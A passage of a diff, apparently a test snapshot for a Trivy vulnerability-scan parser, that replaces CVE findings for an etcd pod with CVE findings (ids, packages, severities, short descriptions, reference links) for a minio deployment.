"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "http://www.osvdb.org/62808", + "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "https://access.redhat.com/security/cve/CVE-2010-0928", + "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "https://www.cve.org/CVERecord?id=CVE-2010-0928", ], }, "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", + "name": "openssl: RSA authentication weakness", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", + "value": "https://avd.aquasec.com/nvd/cve-2010-0928", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", + "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", }, { "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "http://www.osvdb.org/62808", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://access.redhat.com/security/cve/CVE-2010-0928", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-5686", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", + "references": [ + "http://secunia.com/advisories/27215", + "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "http://www.securityfocus.com/bid/26048", + "http://www.vupen.com/english/advisories/2007/3474", + "https://issues.rpath.com/browse/RPL-1825", + ], + }, + "category": "Vulnerability", + "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://avd.aquasec.com/nvd/cve-2007-5686", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "http://secunia.com/advisories/27215", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "http://www.securityfocus.com/bid/26048", + }, + { + "type": "URL", + "value": "http://www.vupen.com/english/advisories/2007/3474", + }, + { + "type": "URL", + "value": "https://issues.rpath.com/browse/RPL-1825", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4235", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "https://access.redhat.com/security/cve/CVE-2013-4235", + "https://access.redhat.com/security/cve/cve-2013-4235", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "https://github.com/shadow-maint/shadow/issues/317", + "https://github.com/shadow-maint/shadow/pull/545", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "https://security.gentoo.org/glsa/202210-26", + "https://ubuntu.com/security/notices/USN-5745-1", + "https://ubuntu.com/security/notices/USN-5745-2", + "https://www.cve.org/CVERecord?id=CVE-2013-4235", ], }, "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://avd.aquasec.com/nvd/cve-2013-4235", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "https://access.redhat.com/security/cve/CVE-2013-4235", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://access.redhat.com/security/cve/cve-2013-4235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://github.com/shadow-maint/shadow/issues/317", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://github.com/shadow-maint/shadow/pull/545", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", }, { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://security.gentoo.org/glsa/202210-26", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://ubuntu.com/security/notices/USN-5745-1", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://ubuntu.com/security/notices/USN-5745-2", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19882", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-19882", + "https://bugs.archlinux.org/task/64836", + "https://bugs.gentoo.org/702252", + "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "https://github.com/shadow-maint/shadow/pull/199", + "https://github.com/void-linux/void-packages/pull/17580", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "https://security.gentoo.org/glsa/202008-09", + "https://www.cve.org/CVERecord?id=CVE-2019-19882", + ], + }, + "category": "Vulnerability", + "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-19882", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-19882", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://bugs.archlinux.org/task/64836", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://bugs.gentoo.org/702252", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://github.com/shadow-maint/shadow/pull/199", + }, + { + "type": "URL", + "value": "https://github.com/void-linux/void-packages/pull/17580", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202008-09", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.0.0-20220412211240-33da011f77ad", - "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-29526", - "installedVersion": "v0.0.0-20210615035016-665e8c7367d1", - "packageName": "golang.org/x/sys", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29383", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-29526", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - "https://github.com/golang/go/issues/52313", - "https://go.dev/cl/399539", - "https://go.dev/cl/400074", - "https://go.dev/issue/52313", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", - "https://linux.oracle.com/cve/CVE-2022-29526.html", - "https://linux.oracle.com/errata/ELSA-2022-5337.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", - "https://pkg.go.dev/vuln/GO-2022-0493", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220729-0001/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "https://access.redhat.com/security/cve/CVE-2023-29383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "https://github.com/shadow-maint/shadow/pull/687", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", ], }, "category": "Vulnerability", - "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "faccessat checks wrong group", + "name": "Improper input validation in shadow-utils package utility chfn", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29526", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29526", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "value": "https://avd.aquasec.com/nvd/cve-2023-29383", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "value": "https://access.redhat.com/security/cve/CVE-2023-29383", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/52313", + "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", }, { "type": "URL", - "value": "https://go.dev/cl/399539", + "value": "https://github.com/shadow-maint/shadow/pull/687", }, { "type": "URL", - "value": "https://go.dev/cl/400074", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", }, { "type": "URL", - "value": "https://go.dev/issue/52313", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-16156", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", + "references": [ + "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", + "https://access.redhat.com/security/cve/CVE-2020-16156", + "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", + "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", + "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", + "https://ubuntu.com/security/notices/USN-5689-1", + "https://ubuntu.com/security/notices/USN-5689-2", + "https://www.cve.org/CVERecord?id=CVE-2020-16156", + ], + }, + "category": "Vulnerability", + "description": "CPAN 2.28 allows Signature Verification Bypass.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "perl-CPAN: Bypass of verification of signatures in CHECKSUMS files", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", + "value": "https://avd.aquasec.com/nvd/cve-2020-16156", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "value": "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "value": "https://access.redhat.com/security/cve/CVE-2020-16156", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0493", + "value": "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", + "value": "https://ubuntu.com/security/notices/USN-5689-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://ubuntu.com/security/notices/USN-5689-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-16156", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.3.7", - "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-38561", - "installedVersion": "v0.3.6", - "packageName": "golang.org/x/text", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-38561", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - "https://deps.dev/advisory/OSV/GO-2021-0113", - "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", - "https://go.dev/cl/340830", - "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", - "https://groups.google.com/g/golang-announce", - "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", - "https://pkg.go.dev/golang.org/x/text/language", - "https://pkg.go.dev/vuln/GO-2021-0113", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31484", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", + "references": [ + "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", + "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", + "https://github.com/andk/cpanpm/pull/175", + "https://metacpan.org/dist/CPAN/changes", + "https://ubuntu.com/security/notices/USN-6112-1", + "https://ubuntu.com/security/notices/USN-6112-2", + "https://www.openwall.com/lists/oss-security/2023/04/18/14", ], }, "category": "Vulnerability", - "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", + "name": "CPAN.pm before 2.35 does not verify TLS certificates when downloading ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-38561", + "value": "https://avd.aquasec.com/nvd/cve-2023-31484", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-38561", + "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", }, { "type": "URL", - "value": "https://deps.dev/advisory/OSV/GO-2021-0113", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", + "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", }, { "type": "URL", - "value": "https://go.dev/cl/340830", + "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", }, { "type": "URL", - "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "value": "https://github.com/andk/cpanpm/pull/175", }, { "type": "URL", - "value": "https://pkg.go.dev/golang.org/x/text/language", + "value": "https://metacpan.org/dist/CPAN/changes", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0113", + "value": "https://ubuntu.com/security/notices/USN-6112-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://ubuntu.com/security/notices/USN-6112-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.6", - "packageName": "golang.org/x/text", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-4116", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "http://www.openwall.com/lists/oss-security/2011/11/04/2", + "http://www.openwall.com/lists/oss-security/2011/11/04/4", + "https://access.redhat.com/security/cve/CVE-2011-4116", + "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", + "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", + "https://rt.cpan.org/Public/Bug/Display.html?id=69106", + "https://seclists.org/oss-sec/2011/q4/238", + "https://www.cve.org/CVERecord?id=CVE-2011-4116", ], }, "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", - "location": 